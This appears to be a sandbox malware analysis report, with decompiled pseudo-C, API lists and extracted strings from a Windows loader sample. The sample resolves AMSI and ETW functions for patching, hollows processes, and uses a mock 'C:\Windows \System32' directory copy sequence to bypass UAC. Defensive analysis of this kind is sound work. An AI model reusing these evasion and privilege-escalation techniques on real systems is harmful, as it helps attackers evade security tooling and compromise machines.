                                                                				_pop(_t1915);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa14)), _t1625, _t1915, _t2074);
                                                                				E02514A98(_t2075 - 0xa18, "BuildImpersonateTrusteeW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa18)));
                                                                				E02514A98(_t2075 - 0xa1c, "advapi32");
                                                                				_pop(_t1918);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa1c)), _t1625, _t1918, _t2074);
                                                                				E02514A98(_t2075 - 0xa20, "BuildSecurityDescriptorW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa20)));
                                                                				E02514A98(_t2075 - 0xa24, "advapi32");
                                                                				_pop(_t1921);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa24)), _t1625, _t1921, _t2074);
                                                                				E02514A98(_t2075 - 0xa28, "AccessCheckByType");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa28)));
                                                                				E02514A98(_t2075 - 0xa2c, "advapi32");
                                                                				_pop(_t1924);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa2c)), _t1625, _t1924, _t2074);
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanBuffer");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0xa30, E02514D64( *((intOrPtr*)(_t2075 - 0xa34))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa30)));
                                                                				_t1654 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0xa3c, _t1654, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0xa38, E02514D64( *((intOrPtr*)(_t2075 - 0xa3c))));
                                                                				_pop(_t1929); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa38)), _t1625, _t1929, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0xa40, E02514D64( *((intOrPtr*)(_t2075 - 0xa44))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa40)));
                                                                				_t1655 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0xa4c, _t1655, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0xa48, E02514D64( *((intOrPtr*)(_t2075 - 0xa4c))));
                                                                				_pop(_t1934); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa48)), _t1625, _t1934, _t2074); // executed
                                                                				E02514A98(_t2075 - 0xa50, "NtCreateFile");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa50)));
                                                                				E02514A98(_t2075 - 0xa54, "ntdll");
                                                                				_pop(_t1937); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa54)), _t1625, _t1937, _t2074); // executed
                                                                				E02514A98(_t2075 - 0xa58, "EtwEventWriteEx");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa58)));
                                                                				E02514A98(_t2075 - 0xa5c, "ntdll");
                                                                				_pop(_t1940);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa5c)), _t1625, _t1940, _t2074);
                                                                				E02514A98(_t2075 - 0xa60, "NtOpenFile");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa60)));
                                                                				E02514A98(_t2075 - 0xa64, "ntdll");
                                                                				_pop(_t1943);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa64)), _t1625, _t1943, _t2074);
                                                                				E02514A98(_t2075 - 0xa68, "EtwEventWrite");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa68)));
                                                                				E02514A98(_t2075 - 0xa6c, "ntdll");
                                                                				_pop(_t1946);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa6c)), _t1625, _t1946, _t2074);
                                                                				ExitProcess(0); // executed
                                                                				_pop(_t1947);
                                                                				 *[fs:eax] = _t1947;
                                                                				_push(E0252A8E4);
                                                                				E025148C4(_t2075 - 0xa6c, 0x64);
                                                                				E025148C4(_t2075 - 0x8dc, 0x63);
                                                                				E025148A0(_t2075 - 0x744);
                                                                				E025148C4(_t2075 - 0x750, 3);
                                                                				E025148C4(_t2075 - 0x740, 0x54);
                                                                				E025148C4(_t2075 - 0x4f0, 0xd);
                                                                				E025148C4(_t2075 - 0x4bc, 0x64);
                                                                				E025148C4(_t2075 - 0x32c, 5);
                                                                				_t1955 =  *0x25251f8; // 0x25251fc
                                                                				E02515A10(_t2075 - 0x318, _t1955);
                                                                				E025148C4(_t2075 - 0x314, 0x1e);
                                                                				_t1957 =  *0x25251f8; // 0x25251fc
                                                                				E02515A10(_t2075 - 0x29c, _t1957);
                                                                				E025148C4(_t2075 - 0x298, 8);
                                                                				_t1959 =  *0x25251f8; // 0x25251fc
                                                                				E02515A10(_t2075 - 0x278, _t1959);
                                                                				E025148C4(_t2075 - 0x274, 0x11);
                                                                				E025148C4(_t2075 - 0x22c, 0x24);
                                                                				E025148A0(_t2075 - 0x198);
                                                                				E025148A0(_t2075 - 0x19c);
                                                                				return E025148C4(_t2075 - 0x194, 0x4e);
                                                                			}
                                                                0x02529784
                                                                0x0252978f
                                                                0x02529790
                                                                0x025297a0
                                                                0x025297ab
                                                                0x025297b7
                                                                0x025297c2
                                                                0x025297c3
                                                                0x025297c8
                                                                0x025297cd
                                                                0x025297d3
                                                                0x025297e3
                                                                0x025297fb
                                                                0x02529806
                                                                0x0252980d
                                                                0x02529818
                                                                0x02529830
                                                                0x0252983b
                                                                0x0252983c
                                                                0x0252983c
                                                                0x02529400
                                                                0x025293eb
                                                                0x02529841
                                                                0x02529846
                                                                0x0252984c
                                                                0x0252985c
                                                                0x02529874
                                                                0x0252987f
                                                                0x02529886
                                                                0x02529891
                                                                0x025298a9
                                                                0x025298b4
                                                                0x025298b5
                                                                0x025298ba
                                                                0x025298c4
                                                                0x025298c9
                                                                0x025298cf
                                                                0x025298d9
                                                                0x025298de
                                                                0x025298e4
                                                                0x025298ee
                                                                0x025298f3
                                                                0x025298f9
                                                                0x025298fe
                                                                0x02529904
                                                                0x02529914
                                                                0x0252992c
                                                                0x02529937
                                                                0x0252993e
                                                                0x02529949
                                                                0x02529961
                                                                0x0252996c
                                                                0x0252996d
                                                                0x02529972
                                                                0x02529977
                                                                0x0252997d
                                                                0x0252998d
                                                                0x025299a5
                                                                0x025299b0
                                                                0x025299b7
                                                                0x025299c2
                                                                0x025299da
                                                                0x025299e5
                                                                0x025299e6
                                                                0x025299f3
                                                                0x025299fe
                                                                0x02529a04
                                                                0x02529a0b
                                                                0x02529a0c
                                                                0x02529a0c
                                                                0x025298f3
                                                                0x025298de
                                                                0x02529a11
                                                                0x02529a16
                                                                0x02529a1c
                                                                0x02529a21
                                                                0x02529a23
                                                                0x02529a28
                                                                0x02529a2a
                                                                0x02529a2f
                                                                0x02529a31
                                                                0x02529a41
                                                                0x02529a59
                                                                0x02529a64
                                                                0x02529a6b
                                                                0x02529a76
                                                                0x02529a8e
                                                                0x02529a99
                                                                0x02529a9a
                                                                0x02529aaa
                                                                0x02529ab5
                                                                0x02529ac1
                                                                0x02529acc
                                                                0x02529acd
                                                                0x02529ad2
                                                                0x02529ad7
                                                                0x02529add
                                                                0x02529aed
                                                                0x02529b05
                                                                0x02529b10
                                                                0x02529b17
                                                                0x02529b22
                                                                0x02529b3a
                                                                0x02529b45
                                                                0x02529b46
                                                                0x02529b56
                                                                0x02529b61
                                                                0x02529b6d
                                                                0x02529b78
                                                                0x02529b79
                                                                0x02529b7e
                                                                0x02529b83
                                                                0x02529b89
                                                                0x02529b99
                                                                0x02529bb1
                                                                0x02529bbc
                                                                0x02529bc3
                                                                0x02529bce
                                                                0x02529be6
                                                                0x02529bf1
                                                                0x02529bf2
                                                                0x02529c02
                                                                0x02529c0d
                                                                0x02529c19
                                                                0x02529c24
                                                                0x02529c25
                                                                0x02529c2a
                                                                0x02529c2f
                                                                0x02529c35
                                                                0x02529c45
                                                                0x02529c5d
                                                                0x02529c68
                                                                0x02529c6f
                                                                0x02529c7a
                                                                0x02529c92
                                                                0x02529c9d
                                                                0x02529c9e
                                                                0x02529cae
                                                                0x02529cb9
                                                                0x02529cc5
                                                                0x02529cd0
                                                                0x02529cd1
                                                                0x02529ce1
                                                                0x02529cec
                                                                0x02529cf8
                                                                0x02529d03
                                                                0x02529d04
                                                                0x02529d09
                                                                0x02529d0e
                                                                0x02529d14
                                                                0x02529d24
                                                                0x02529d3c
                                                                0x02529d47
                                                                0x02529d4e
                                                                0x02529d59
                                                                0x02529d71
                                                                0x02529d7c
                                                                0x02529d7d
                                                                0x02529d82
                                                                0x02529d87
                                                                0x02529d8d
                                                                0x02529d9d
                                                                0x02529db5
                                                                0x02529dc0
                                                                0x02529dc7
                                                                0x02529dd2
                                                                0x02529dea
                                                                0x02529df5
                                                                0x02529df6
                                                                0x02529e06
                                                                0x02529e11
                                                                0x02529e1d
                                                                0x02529e28
                                                                0x02529e29
                                                                0x02529e39
                                                                0x02529e44
                                                                0x02529e50
                                                                0x02529e5b
                                                                0x02529e5c
                                                                0x02529e6c
                                                                0x02529e77
                                                                0x02529e83
                                                                0x02529e8e
                                                                0x02529e8f
                                                                0x02529e9f
                                                                0x02529eaa
                                                                0x02529eb6
                                                                0x02529ec1
                                                                0x02529ec2
                                                                0x02529ed2
                                                                0x02529edd
                                                                0x02529ee9
                                                                0x02529ef4
                                                                0x02529ef5
                                                                0x02529f05
                                                                0x02529f10
                                                                0x02529f1c
                                                                0x02529f27
                                                                0x02529f28
                                                                0x02529f38
                                                                0x02529f43
                                                                0x02529f4f
                                                                0x02529f5a
                                                                0x02529f5b
                                                                0x02529f6b
                                                                0x02529f76
                                                                0x02529f82
                                                                0x02529f8d
                                                                0x02529f8e
                                                                0x02529f9e
                                                                0x02529fa9
                                                                0x02529fb5
                                                                0x02529fc0
                                                                0x02529fc1
                                                                0x02529fd1
                                                                0x02529fdc
                                                                0x02529fe8
                                                                0x02529ff3
                                                                0x02529ff4
                                                                0x0252a004
                                                                0x0252a00f
                                                                0x0252a01b
                                                                0x0252a026
                                                                0x0252a027
                                                                0x0252a037
                                                                0x0252a042
                                                                0x0252a04e
                                                                0x0252a059
                                                                0x0252a05a
                                                                0x0252a06a
                                                                0x0252a075
                                                                0x0252a081
                                                                0x0252a08c
                                                                0x0252a08d
                                                                0x0252a09d
                                                                0x0252a0a8
                                                                0x0252a0b4
                                                                0x0252a0bf
                                                                0x0252a0c0
                                                                0x0252a0d0
                                                                0x0252a0db
                                                                0x0252a0e7
                                                                0x0252a0f2
                                                                0x0252a0f3
                                                                0x0252a103
                                                                0x0252a10e
                                                                0x0252a11a
                                                                0x0252a125
                                                                0x0252a126
                                                                0x0252a136
                                                                0x0252a141
                                                                0x0252a14d
                                                                0x0252a158
                                                                0x0252a159
                                                                0x0252a169
                                                                0x0252a174
                                                                0x0252a180
                                                                0x0252a18b
                                                                0x0252a18c
                                                                0x0252a19c
                                                                0x0252a1a7
                                                                0x0252a1b3
                                                                0x0252a1be
                                                                0x0252a1bf
                                                                0x0252a1cf
                                                                0x0252a1da
                                                                0x0252a1e6
                                                                0x0252a1f1
                                                                0x0252a1f2
                                                                0x0252a202
                                                                0x0252a20d
                                                                0x0252a219
                                                                0x0252a224
                                                                0x0252a225
                                                                0x0252a235
                                                                0x0252a240
                                                                0x0252a24c
                                                                0x0252a257
                                                                0x0252a258
                                                                0x0252a268
                                                                0x0252a273
                                                                0x0252a27f
                                                                0x0252a28a
                                                                0x0252a28b
                                                                0x0252a29b
                                                                0x0252a2a6
                                                                0x0252a2b2
                                                                0x0252a2bd
                                                                0x0252a2be
                                                                0x0252a2ce
                                                                0x0252a2d9
                                                                0x0252a2e5
                                                                0x0252a2f0
                                                                0x0252a2f1
                                                                0x0252a301
                                                                0x0252a30c
                                                                0x0252a318
                                                                0x0252a323
                                                                0x0252a324
                                                                0x0252a334
                                                                0x0252a33f
                                                                0x0252a34b
                                                                0x0252a356
                                                                0x0252a357
                                                                0x0252a367
                                                                0x0252a372
                                                                0x0252a37e
                                                                0x0252a389
                                                                0x0252a38a
                                                                0x0252a39a
                                                                0x0252a3a5
                                                                0x0252a3b1
                                                                0x0252a3bc
                                                                0x0252a3bd
                                                                0x0252a3cd
                                                                0x0252a3d8
                                                                0x0252a3e4
                                                                0x0252a3ef
                                                                0x0252a3f0
                                                                0x0252a400
                                                                0x0252a40b
                                                                0x0252a417
                                                                0x0252a422
                                                                0x0252a423
                                                                0x0252a433
                                                                0x0252a43e
                                                                0x0252a44a
                                                                0x0252a455
                                                                0x0252a456
                                                                0x0252a466
                                                                0x0252a471
                                                                0x0252a47d
                                                                0x0252a488
                                                                0x0252a489
                                                                0x0252a499
                                                                0x0252a4a4
                                                                0x0252a4b0
                                                                0x0252a4bb
                                                                0x0252a4bc
                                                                0x0252a4cc
                                                                0x0252a4d7
                                                                0x0252a4e3
                                                                0x0252a4ee
                                                                0x0252a4ef
                                                                0x0252a4ff
                                                                0x0252a50a
                                                                0x0252a516
                                                                0x0252a521
                                                                0x0252a522
                                                                0x0252a532
                                                                0x0252a53d
                                                                0x0252a549
                                                                0x0252a554
                                                                0x0252a555
                                                                0x0252a565
                                                                0x0252a570
                                                                0x0252a57c
                                                                0x0252a587
                                                                0x0252a588
                                                                0x0252a598
                                                                0x0252a5a3
                                                                0x0252a5af
                                                                0x0252a5ba
                                                                0x0252a5bb
                                                                0x0252a5cb
                                                                0x0252a5d6
                                                                0x0252a5e2
                                                                0x0252a5ed
                                                                0x0252a5ee
                                                                0x0252a5f3
                                                                0x0252a5f8
                                                                0x0252a5fe
                                                                0x0252a60e

                                                                APIs
                                                                  • Part of subcall function 02525698: _lcreat.KERNEL32(00000000,00000000), ref: 025256CF
                                                                  • Part of subcall function 02525698: _lwrite.KERNEL32(00000000,00000000,?,00000000,02525715), ref: 025256EF
                                                                  • Part of subcall function 02525698: _lclose.KERNEL32(00000000), ref: 025256F5
                                                                  • Part of subcall function 025236CC: GetModuleHandleA.KERNEL32(00000000,00000000,02523792), ref: 02523725
                                                                  • Part of subcall function 025236CC: GetProcAddress.KERNEL32(77CD0000,00000000), ref: 02523748
                                                                  • Part of subcall function 025236CC: FreeLibrary.KERNEL32(77CD0000,00000000,00000000,02523792), ref: 02523772
                                                                  • Part of subcall function 02518110: GetFileAttributesA.KERNEL32(00000000,?,02526AA4,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 0251811B
                                                                  • Part of subcall function 02525724: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252583C
                                                                  • Part of subcall function 02525724: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525853
                                                                  • Part of subcall function 02525724: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252585C
                                                                  • Part of subcall function 02525724: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525865
                                                                • Sleep.KERNEL32(00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe,0252AE60), ref: 02528A4C
                                                                • DeleteFileA.KERNEL32(00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe,0252AE60), ref: 02528A80
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe,0252AE60), ref: 02528ABA
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe,0252AE60), ref: 02528AF4
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60,easinvoker.exe), ref: 02528B2E
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat,0252AE60), ref: 02528B68
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001388,ScanBuffer,0252AD5C,KDECO.bat,0252AE60,netutils.dll,0252AE60,ScanString,0252AD5C,O.bat), ref: 02528B9C
                                                                • WinExec.KERNEL32 ref: 025294FF
                                                                • OpenProcess.KERNEL32(001F0FFF,000000FF,00000000,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize,0252AD5C,UacScan), ref: 02529520
                                                                • NtSuspendProcess.N(00000000,001F0FFF,000000FF,00000000,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize,0252AD5C), ref: 02529530
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02524F87
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FAD
                                                                  • Part of subcall function 02524F34: VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FD7
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0252502F
                                                                  • Part of subcall function 02512FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000), ref: 02512FE8
                                                                  • Part of subcall function 025248A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 02524959
                                                                  • Part of subcall function 025248A4: GetThreadContext.KERNEL32(000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 0252497B
                                                                  • Part of subcall function 025248A4: ReadProcessMemory.KERNEL32(000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C), ref: 025249A3
                                                                  • Part of subcall function 025248A4: NtUnmapViewOfSection.N(000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 025249C7
                                                                  • Part of subcall function 025248A4: VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 025249EF
                                                                • ExitProcess.KERNEL32(00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,Initialize,0252AD5C,OpenSession,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,OpenSession,0252AD5C,0252B044), ref: 0252A7B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$DeleteProcess$Virtual$Alloc$Handle$CloseCreateModule$AddressAttributesContextExecExitFreeLibraryMemoryNameObjectOpenProcProtectReadSectionSingleSleepSuspendThreadUnmapViewWait_lclose_lcreat_lwrite
                                                                • String ID: AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$GetEventLogInformation$Initialize$KDECO.bat$NotifyChangeEventLog$NtCreateFile$NtOpenFile$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$advapi32$easinvoker.exe$iexpress$iexpress.exe$kernel32$mkdir "\\?\C:\Windows " mkdir "\\?\C:\Windows \System32"ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /YECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /YECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y"C:\Wi$netutils.dll$ntdll$shell32
                                                                • API String ID: 1536863316-3406292098
                                                                • Opcode ID: df91074bbf354d9cdb58d88f77fc67a9fe89313c42c6cff5ff8fd80ebe227523
                                                                • Instruction ID: 7bbc793d8b09a6fe38c3741049169c694ce04be8bd2a3052cb186e83b37003b7
                                                                • Opcode Fuzzy Hash: df91074bbf354d9cdb58d88f77fc67a9fe89313c42c6cff5ff8fd80ebe227523
                                                                • Instruction Fuzzy Hash: FBF2D075B0112A9BEB10EB54D880ADE73B7FFC5300F5199E69008A7290DE34AE89DF5D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                C-Code - Quality: 51%
                                                                			E02528285(intOrPtr __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                				intOrPtr _t563;
                                                                				void* _t568;
                                                                				intOrPtr _t611;
                                                                				intOrPtr _t615;
                                                                				void* _t616;
                                                                				intOrPtr _t617;
                                                                				intOrPtr _t621;
                                                                				intOrPtr _t697;
                                                                				intOrPtr _t713;
                                                                				intOrPtr _t729;
                                                                				intOrPtr _t1223;
                                                                				intOrPtr _t1225;
                                                                				void* _t1259;
                                                                				void* _t1260;
                                                                				intOrPtr _t1262;
                                                                				intOrPtr _t1264;
                                                                				long _t1297;
                                                                				intOrPtr _t1299;
                                                                				void* _t1315;
                                                                				intOrPtr _t1316;
                                                                				intOrPtr _t1395;
                                                                				intOrPtr _t1397;
                                                                				intOrPtr _t1507;
                                                                				intOrPtr _t1513;
                                                                				intOrPtr _t1521;
                                                                				intOrPtr _t1529;
                                                                				intOrPtr _t1537;
                                                                				intOrPtr _t1545;
                                                                				intOrPtr _t1553;
                                                                				intOrPtr _t1568;
                                                                				intOrPtr _t1569;
                                                                				intOrPtr _t1570;
                                                                				intOrPtr _t1571;
                                                                				intOrPtr _t1574;
                                                                				intOrPtr _t1575;
                                                                				intOrPtr _t1576;
                                                                				intOrPtr _t1577;
                                                                				intOrPtr _t1578;
                                                                				intOrPtr _t1579;
                                                                				intOrPtr _t1580;
                                                                				intOrPtr _t1581;
                                                                				intOrPtr _t1582;
                                                                				intOrPtr _t1583;
                                                                				intOrPtr _t1584;
                                                                				intOrPtr _t1585;
                                                                				intOrPtr _t1586;
                                                                				intOrPtr _t1587;
                                                                				intOrPtr _t1588;
                                                                				intOrPtr _t1591;
                                                                				intOrPtr _t1592;
                                                                				intOrPtr _t1593;
                                                                				intOrPtr _t1594;
                                                                				intOrPtr _t1595;
                                                                				intOrPtr _t1596;
                                                                				intOrPtr _t1597;
                                                                				intOrPtr _t1598;
                                                                				intOrPtr _t1599;
                                                                				intOrPtr _t1600;
                                                                				intOrPtr _t1601;
                                                                				intOrPtr _t1602;
                                                                				intOrPtr _t1603;
                                                                				intOrPtr _t1604;
                                                                				intOrPtr _t1605;
                                                                				void* _t1611;
                                                                				void* _t1617;
                                                                				void* _t1622;
                                                                				void* _t1627;
                                                                				intOrPtr _t1628;
                                                                				void* _t1639;
                                                                				void* _t1644;
                                                                				void* _t1649;
                                                                				void* _t1654;
                                                                				void* _t1659;
                                                                				void* _t1665;
                                                                				void* _t1671;
                                                                				void* _t1677;
                                                                				void* _t1680;
                                                                				void* _t1685;
                                                                				void* _t1688;
                                                                				void* _t1693;
                                                                				void* _t1696;
                                                                				void* _t1701;
                                                                				void* _t1704;
                                                                				void* _t1707;
                                                                				void* _t1712;
                                                                				void* _t1717;
                                                                				void* _t1720;
                                                                				void* _t1723;
                                                                				void* _t1726;
                                                                				void* _t1729;
                                                                				void* _t1732;
                                                                				void* _t1735;
                                                                				void* _t1738;
                                                                				void* _t1741;
                                                                				void* _t1744;
                                                                				void* _t1747;
                                                                				void* _t1750;
                                                                				void* _t1753;
                                                                				void* _t1756;
                                                                				void* _t1759;
                                                                				void* _t1762;
                                                                				void* _t1765;
                                                                				void* _t1768;
                                                                				void* _t1771;
                                                                				void* _t1774;
                                                                				void* _t1777;
                                                                				void* _t1780;
                                                                				void* _t1783;
                                                                				void* _t1786;
                                                                				void* _t1789;
                                                                				void* _t1792;
                                                                				void* _t1795;
                                                                				void* _t1798;
                                                                				void* _t1801;
                                                                				void* _t1804;
                                                                				void* _t1807;
                                                                				void* _t1810;
                                                                				void* _t1813;
                                                                				void* _t1816;
                                                                				void* _t1819;
                                                                				void* _t1822;
                                                                				void* _t1825;
                                                                				void* _t1828;
                                                                				void* _t1831;
                                                                				void* _t1834;
                                                                				void* _t1837;
                                                                				void* _t1842;
                                                                				void* _t1847;
                                                                				void* _t1850;
                                                                				void* _t1853;
                                                                				void* _t1856;
                                                                				void* _t1859;
                                                                				intOrPtr _t1860;
                                                                				intOrPtr _t1868;
                                                                				intOrPtr _t1870;
                                                                				intOrPtr _t1872;
                                                                				void* _t1882;
                                                                				void* _t1887;
                                                                				void* _t1896;
                                                                				void* _t1901;
                                                                				void* _t1906;
                                                                				void* _t1912;
                                                                				void* _t1915;
                                                                				void* _t1920;
                                                                				void* _t1923;
                                                                				void* _t1928;
                                                                				void* _t1931;
                                                                				void* _t1936;
                                                                				void* _t1943;
                                                                				void* _t1948;
                                                                				void* _t1953;
                                                                				void* _t1956;
                                                                				void* _t1961;
                                                                				void* _t1964;
                                                                				void* _t1969;
                                                                				void* _t1972;
                                                                				void* _t1977;
                                                                				void* _t1988;
                                                                				void* _t1996;
                                                                
                                                                				_t1999 = __fp0;
                                                                				_t1987 = __esi;
                                                                				_t1986 = __edi;
                                                                				_t1561 = __ebx;
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t1988 - 0x4d0, E02514D64( *((intOrPtr*)(_t1988 - 0x4d4))));
                                                                				_push( *((intOrPtr*)(_t1988 - 0x4d0)));
                                                                				_t1568 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t1988 - 0x4dc, _t1568, 0x252ad5c);
                                                                				E02514A98(_t1988 - 0x4d8, E02514D64( *((intOrPtr*)(_t1988 - 0x4dc))));
                                                                				_pop(_t1611);
                                                                				E025236CC( *((intOrPtr*)(_t1988 - 0x4d8)), __ebx, _t1611, __esi);
                                                                				_t563 =  *0x256d8e8; // 0x0
                                                                				E02514A98(_t1988 - 0x4e0, E02514D64(_t563));
                                                                				_t568 = E02518110( *((intOrPtr*)(_t1988 - 0x4e0)));
                                                                				_t1990 = _t568;
                                                                				if(_t568 != 0) {
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("ScanBuffer");
                                                                					E02514C24();
                                                                					E02514A98(_t1988 - 0x4e4, E02514D64( *((intOrPtr*)(_t1988 - 0x4e8))));
                                                                					_push( *((intOrPtr*)(_t1988 - 0x4e4)));
                                                                					_t1605 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0(_t1988 - 0x4f0, _t1605, 0x252ad5c);
                                                                					E02514A98(_t1988 - 0x4ec, E02514D64( *((intOrPtr*)(_t1988 - 0x4f0))));
                                                                					_pop(_t1977);
                                                                					E025236CC( *((intOrPtr*)(_t1988 - 0x4ec)), __ebx, _t1977, __esi);
                                                                					_t1507 =  *0x256d8e8; // 0x0
                                                                					E02514D64(_t1507);
                                                                					E025137AC();
                                                                					E02525724(_t1988 - 0x5f0, _t1561, 0, 0x252afa8, __edi, _t1987, _t1990, __fp0);
                                                                					Sleep(0x32c8);
                                                                					_t1513 =  *0x256d8e4; // 0x0
                                                                					E02514A98(_t1988 - 0x5f4, E02514D64(_t1513));
                                                                					 *((intOrPtr*)(_t1988 - 0x230)) =  *((intOrPtr*)(_t1988 - 0x5f4));
                                                                					DeleteFileA(E02514D64( *((intOrPtr*)(_t1988 - 0x230))));
                                                                					asm("sbb eax, eax");
